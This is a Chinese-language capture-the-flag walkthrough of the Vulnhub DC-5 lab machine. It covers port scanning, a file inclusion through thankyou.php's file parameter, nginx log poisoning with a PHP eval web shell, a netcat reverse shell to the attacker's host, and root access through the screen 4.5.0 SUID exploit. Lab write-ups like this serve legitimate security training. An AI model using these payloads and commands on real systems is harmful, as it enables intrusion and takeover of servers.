Vulnhub--DC-5

一，部署方法

1. 在官网上下载zip压缩包
2. 下载到本地上解压缩后使用虚拟机导入.ova后缀的文件（在过程中出现问题不用理睬，点击重试即可）
3. 配置网络，本人设置的是nat模式，这个看个人需求
4. 打开靶机即可

二，靶机地址和描述

1. 下载地址

https://download.vulnhub.com/dc/DC-5.zip

2. 靶机描述

三，测试

1. 信息收集

使用

arp-scan -l

扫描网段，查找靶机地址

扫描出来149为靶机地址，148为攻击机地址

使用

nmap -A -T4 -p- 192.168.237.149

扫描149的端口开放情况

发现开放80端口—web服务。111端口和60046端口。

使用目录扫描工具进行扫描

dirb http://192.168.237.149/

毫无任何有用的信息

尝试访问靶机开放的80端口

这里点击所有的功能点，发现在contact功能下有点小东西~

有一个留言功能，进行填写提交

提交后，发现有地方改变

查看源代码

发现可能存在footer.php的页面，访问查看

这里发现：

在thankyou.php的页面下包含了一个footer.php页面，每次刷新thankyou.php的页面后，页脚中的footer.php也会随之改变，这里怀疑存在文件包含漏洞

抓包爆破查看文件包含漏洞的参数

发现是file参数。

尝试进行读取系统中的/etc/passwd，查看是否能读取到信息

成功读取到/etc/passwd的信息

2. 反弹shell

再次查看页面，使用wappalyzer，发现这里的中间件是nginx 1.6.2

nginx会记录我们的访问日志，这里可以在请求中写入一句话木马，然后读取日志文件，进行getshell

让我们查看Nginx的配置文件

发现日志文件的位置，访问/var/log/nginx/access.log

发现可以构造firstname=......一句话木马进行保存到日志中

构造参数

firstname=<?php @eval($_POST[‘HK’]); ?>

访问/thankyou.php?file=/var/log/nginx/access.log

使用蚁剑进行链接

成功进行链接

进入虚拟终端进行反弹shell

使用kali攻击机进行监听

nc -lvvp 4444

使用蚁剑进行反弹shell

nc 192.168.237.148 4444 -e /bin/bash

成功反弹shell

使用命令进行交互式界面

python -c “import pty;pty.spawn(‘/bin/bash’)”

查看当前用户

whoami

为最低权限，尝试提权

3. 提权

首先查找具有SUID的命令

find / -user root -perm -4000 -print 2>/dev/null

发现screen-4.5.0有大嫌疑，尝试使用kali内自带的漏洞库进行检索

searchsploit screen 4.5.0

使用

cat /usr/share/exploitdb/exploits/linux/local/41154.sh

根据文件中的提示进行操作。

将上面这部分复制粘贴到libhax.c中

将下面的一段代码保存到rootshell.c中

将剩下的代码保存到a.sh中

进行编译libhax.c和rootshell.c文件

gcc -fPIC -shared -ldl -o libhax.so libhax.c

gcc -o rootshell rootshell.c

将编译好的rootshell libhax.so和a.sh上传到靶机的/tmp目录下，使用蚁剑进行上传

继续在kali中的监听窗口进行输入命令

cd /tmp

chmod +x a.sh

./a.sh

提权成功

进入/root目录下，查看flag

四，总结

1. 文件包含漏洞
2. 一句话木马
3. 蚁剑getshell
4. Screen 4.5.0提权